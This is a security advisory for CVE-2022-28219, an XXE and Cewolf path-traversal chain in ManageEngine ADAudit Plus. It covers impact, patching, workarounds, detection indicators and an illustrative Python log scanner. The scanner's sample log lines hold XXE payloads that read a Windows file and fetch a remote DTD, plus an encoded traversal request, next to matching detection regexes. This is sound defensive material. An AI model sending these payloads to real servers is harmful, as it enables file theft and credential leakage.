CVE-2022-28219
📋 TL;DR
CVE-2022-28219 is an unauthenticated XML External Entity (XXE) vulnerability in Zoho ManageEngine ADAudit Plus, affecting builds before 7060. On its own the XXE lets an unauthenticated remote attacker read files from the server and force it to make outbound connections; on Windows this can leak the NTLM credentials of the account ADAudit Plus runs as, which is commonly a privileged domain account. Chained with a path traversal in the bundled Cewolf charting servlet, which ends in deserialization of attacker-controlled data (see the Horizon3 and Packet Storm references below), it yields remote code execution and complete compromise of the server without any credentials.
💻 Affected Systems
- Zoho ManageEngine ADAudit Plus
📦 What is this software?
ADAudit Plus is ManageEngine's (Zoho) Active Directory change auditing and reporting product; it is normally installed on a Windows server inside the domain and runs with an account that has broad read rights across AD, file servers and member servers. Cewolf is an open-source, JFreeChart-based servlet and JSP tag library for rendering charts that ADAudit Plus bundles for its reports; the vulnerable code path is in that bundled component, not in a separately installed package.
⚠️ Risk & Real-World Impact
Worst Case
Full compromise of the ADAudit Plus server with administrative privileges, theft of the privileged service account's credentials, and from there lateral movement across the domain, data exfiltration, and ransomware deployment.
Likely Case
Remote code execution leading to installation of backdoors, credential theft, and persistence mechanisms on the affected server.
If Mitigated
Impact is contained if the web interface is reachable only from trusted administrative networks and the server is denied outbound connections (which blunts XXE file exfiltration and NTLM credential leakage). A WAF may stop naive XML payloads but should not be relied on to break the full chain.
🎯 Exploit Status
Public exploit code is available (Packet Storm, and a detailed write-up with a proof of concept from Horizon3). The attack requires no authentication and, with the public code, little skill to reproduce.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 7060 and later
Vendor Advisory: https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
Restart Required: Yes
Instructions:
1. Download ManageEngine ADAudit Plus build 7060 or later from the official vendor site.
2. Back up the current installation (and its database) before upgrading.
3. Run the installer to upgrade in place.
4. Restart the ADAudit Plus service and confirm the new build number in the web console.
🔧 Temporary Workarounds
Network Access Control
Restrict network access to the ADAudit Plus web interface using firewall rules so that only administrative hosts and ADAudit Plus agents can reach it.
Web Application Firewall
Deploy a WAF with XXE protection rules (block request bodies containing DOCTYPE and external ENTITY declarations) to filter malicious XML payloads; treat this as a speed bump, not a fix.
🧯 If You Can't Patch
- Isolate the ADAudit Plus server in a restricted network segment with no internet access
- Block outbound SMB, FTP and HTTP from the server to untrusted destinations, and alert on suspicious XML requests to the ADAudit Plus web interface and on any outbound connection attempts it makes
🔍 How to Verify
Check if Vulnerable:
Read the build number from the ADAudit Plus web console (About/Help) or from the version files in the installation directory; any build number below 7060 is vulnerable.
Check Version:
Check the web interface at https://[server]:[port]/api/version where that endpoint is exposed on your build, or examine the version files in the installation directory. The About dialog in the console is authoritative if the two disagree.
Verify Fix Applied:
Confirm the build number is 7060 or higher after the service restart. If you test with XXE payloads, do so in an authorized test environment and expect the parser to reject external entity declarations rather than resolve them.
📡 Detection & Monitoring
Log Indicators:
- Unauthenticated XML POST requests to ADAudit Plus endpoints whose bodies contain DOCTYPE or ENTITY declarations
- Requests to the Cewolf servlet path containing directory traversal sequences (../ or URL-encoded variants)
- Child processes such as cmd.exe or powershell.exe spawned by the ADAudit Plus Java process
- Outbound connections from the ADAudit Plus server to unknown IPs
Network Indicators:
- XML payloads containing external entity references sent to ADAudit Plus ports
- Unexpected outbound SMB (445), FTP or HTTP connections from the ADAudit Plus server, which are how XXE exfiltration and NTLM credential capture manifest on the wire
SIEM Query:
The query below is pseudo-SPL; field names such as request_body, uri_query and parent_process are placeholders for whatever your proxy, WAF and EDR actually emit. Parentheses matter: the original form mixed AND and OR without grouping.
source="ADAudit Plus" AND (
  (http_method="POST" AND request_body="*<!DOCTYPE*" AND request_body="*<!ENTITY*")
  OR (uri_path="*cewolf*" AND uri_query="*..*")
  OR (parent_process="*java.exe" AND (process_name="cmd.exe" OR process_name="powershell.exe"))
)
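The following script is an added example, not part of this advisory or of any vendor tooling. It applies the same two request-level indicators as the SIEM query to a log file: external or parameter entity declarations in POST bodies, and traversal sequences (including double URL encoding) in requests to the Cewolf servlet. The JSON-lines log shape and the sample entries are constructed for illustration; the endpoint paths in the samples are placeholders, and in practice the body field requires a WAF or reverse proxy that logs request bodies, since ordinary access logs do not.

```python
"""Detect XXE and Cewolf path-traversal indicators in web request logs.

Added example, not from the advisory or the vendor. Log format is a
constructed JSON-lines shape: one object per request with "method",
"path", "query" and "body" fields. Adapt field names to your proxy/WAF.
"""
import json
import re
from urllib.parse import unquote

# External entity declaration (<!ENTITY name SYSTEM/PUBLIC ...>), including
# parameter entities (<!ENTITY % name SYSTEM ...>) used by blind/OOB XXE.
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAMETER_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Traversal in the encodings a servlet container may still decode.
TRAVERSAL_RE = re.compile(
    r"(\.\./|\.\.\\|%2e%2e|\.\.%2f|\.\.%5c)", re.IGNORECASE)


def classify_request(req):
    """Return the list of indicator names that fire for one request dict."""
    hits = []
    body = req.get("body") or ""
    if req.get("method", "").upper() == "POST" and DOCTYPE_RE.search(body):
        if EXTERNAL_ENTITY_RE.search(body):
            hits.append("xxe_external_entity")
        if PARAMETER_ENTITY_RE.search(body):
            hits.append("xxe_parameter_entity")
    path = req.get("path") or ""
    if "cewolf" in path.lower():
        # Decode twice so %252e%252e (double-encoded "..") is caught as well.
        query = unquote(unquote(req.get("query") or ""))
        if TRAVERSAL_RE.search(query):
            hits.append("cewolf_path_traversal")
    return hits


def scan_log(lines):
    """Parse JSON-lines and return (line_no, path, hits) for flagged requests."""
    findings = []
    for n, line in enumerate(lines, start=1):
        line = line.strip()
        if not line:
            continue
        try:
            req = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line; a real pipeline should count these
        hits = classify_request(req)
        if hits:
            findings.append((n, req.get("path", ""), hits))
    return findings


# Constructed sample log lines (placeholder paths), not captured traffic.
SAMPLE_LOG = [
    json.dumps({"method": "GET", "path": "/", "query": "", "body": ""}),
    json.dumps({"method": "POST", "path": "/api/example/xml", "query": "",
                "body": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM '
                        '"file:///c:/windows/win.ini">]><r>&xxe;</r>'}),
    json.dumps({"method": "POST", "path": "/api/example/xml", "query": "",
                "body": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % dtd SYSTEM '
                        '"http://203.0.113.5/x.dtd"> %dtd;]><r/>'}),
    json.dumps({"method": "GET", "path": "/cewolf/cewolf",
                "query": "img=/..%2f..%2fsome/file", "body": ""}),
    json.dumps({"method": "POST", "path": "/api/example/xml", "query": "",
                "body": '<?xml version="1.0"?><r><e>benign</e></r>'}),
    json.dumps({"method": "GET", "path": "/cewolf/cewolf",
                "query": "img=chart123", "body": ""}),
]

if __name__ == "__main__":
    for line_no, path, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {path} -> {', '.join(hits)}")
```

Lines 2, 3 and 4 of the sample are flagged; the benign XML POST and the ordinary Cewolf image request are not. The parameter-entity check is kept separate because blind XXE against a server with no direct egress path shows up only as that declaration plus an outbound DNS or HTTP attempt, so the two signals should be correlated in the SIEM.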
🔗 References
- http://cewolf.sourceforge.net/new/index.html
- http://packetstormsecurity.com/files/167997/ManageEngine-ADAudit-Plus-Path-Traversal-XML-Injection.html
- https://manageengine.com
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html